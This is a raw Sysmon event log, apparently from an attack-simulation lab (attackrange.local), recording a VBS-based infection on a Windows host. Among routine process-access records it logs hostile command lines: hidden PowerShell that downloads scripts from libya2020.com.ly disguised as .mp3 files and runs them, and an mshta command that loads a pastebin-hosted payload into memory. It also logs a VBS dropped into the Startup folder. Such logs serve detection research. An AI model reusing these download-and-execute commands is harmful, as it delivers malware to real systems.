07:59:20.054{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106281Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.054{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106280Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.054{58E9C193-B458-615A-1A02-00000000FC01}54485724C:\Windows\system32\conhost.exe{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106279Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.047{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106278Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.047{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106277Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.047{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B458-615A-1D02-00000000FC01}4292C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106276Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.045{58E9C193-B457-615A-1602-00000000FC01}20003756C:\Windows\System32\WScript.exe{58E9C193-B458-615A-1D02-00000000FC01}4292C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106275Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.046{58E9C193-B458-615A-1D02-00000000FC01}4292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106274Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.041{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B458-615A-1C02-00000000FC01}4336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106273Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.028{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106272Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.028{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106271Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.028{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106270Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.028{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106269Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.028{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106268Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.023{58E9C193-B457-615A-1602-00000000FC01}20005828C:\Windows\System32\WScript.exe{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106267Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.027{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/TR.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\nono.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\nono.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106266Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.023{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B458-615A-1A02-00000000FC01}5448C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x8000000000000000106265Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.016{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=162EC9B97856DE40660B106705A58900,SHA256=80A2EAD5DD8F49C21244AB2A2350882833AC67435962D5743189266CACC14040,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106264Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106263Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106262Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106261Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106260Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106259Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-B457-615A-1602-00000000FC01}20005320C:\Windows\System32\WScript.exe{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106258Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.011{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/google01.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\lovefhdfhdf.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\lovefhdfhdf.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106257Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B457-615A-1802-00000000FC01}2584C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106256Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B457-615A-1802-00000000FC01}2584C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106255Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 07:59:20.000{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______ _____ ___ ______ ______.vbs2021-10-04 07:44:22.066 23542300x8000000000000000106254Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-B457-615A-1602-00000000FC01}2000ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______ _____ ___ ______ ______.vbsMD5=F11AF900F15215D81245B000809E7BE8,SHA256=79152EFEFD6F3C958CDB4B2FAA6FF2A1F18FAB55EBE28B9873154DEC9BBA37EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106253Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.000{58E9C193-B457-615A-1802-00000000FC01}25841440C:\Windows\system32\conhost.exe{58E9C193-B457-615A-1702-00000000FC01}1692C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106421Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=36800F032E5B7B1B5DA6A73B7530FBE8,SHA256=736ADF6381FC838507A7C6078C011FCFCE8C7701E24F8CD802BC6469EE42B89C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106420Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.222{58E9C193-B458-615A-2402-00000000FC01}5420ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106419Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.199{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 